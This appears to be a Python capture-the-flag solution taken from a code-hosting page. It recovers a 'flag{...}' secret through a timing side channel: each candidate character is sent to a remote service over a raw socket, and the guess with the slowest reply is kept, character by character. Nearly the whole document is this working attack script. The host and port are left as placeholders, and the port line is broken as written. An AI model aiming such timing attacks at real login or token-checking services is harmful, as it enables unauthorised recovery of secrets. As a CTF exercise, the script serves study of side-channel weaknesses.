You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
58 lines
1.4 KiB
58 lines
1.4 KiB
#!/bin/python3 |
|
|
|
# Timing Attack Script |
|
|
|
import os |
|
import time |
|
import string |
|
import socket |
|
|
|
ALL_CHARS = string.ascii_lowercase + '_' + '}' |
|
START_STR = "flag{" |
|
|
|
def netcat(hostname, port, content): |
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
|
s.connect((hostname, port)) |
|
s.sendall(content.encode()) |
|
s.shutdown(socket.SHUT_WR) |
|
while 1: |
|
data = s.recv(1024) |
|
if data.decode() == "": |
|
break |
|
code = repr(data.decode()) |
|
s.close() |
|
return(str(code)) |
|
|
|
def timing_attack(flag): |
|
HN = "hostname" |
|
PORT = #PORT |
|
durations = [] |
|
greatest = 0 |
|
index = 0 |
|
for i in range(28): |
|
os.system('cls' if os.name == 'nt' else 'clear') |
|
print(f"testing letter {ALL_CHARS[i]}...") |
|
print(f"flag: {flag}") |
|
flag += ALL_CHARS[i] |
|
t_start = time.time() |
|
return_code = netcat(HN, PORT, flag) |
|
t_end = time.time() |
|
duration = t_end - t_start |
|
durations.append(duration) |
|
l = len(flag) |
|
flag = flag[:l-1] |
|
for i in range(len(durations)): |
|
if durations[i] > greatest: |
|
greatest = durations[i] |
|
index = i |
|
flag += ALL_CHARS[index] |
|
if (ALL_CHARS[index] == '}'): |
|
print(f"the flag is: {flag}") |
|
quit() |
|
timing_attack(flag) |
|
|
|
def main(): |
|
timing_attack(START_STR) |
|
|
|
if __name__ == "__main__": |
|
main()
|
|
|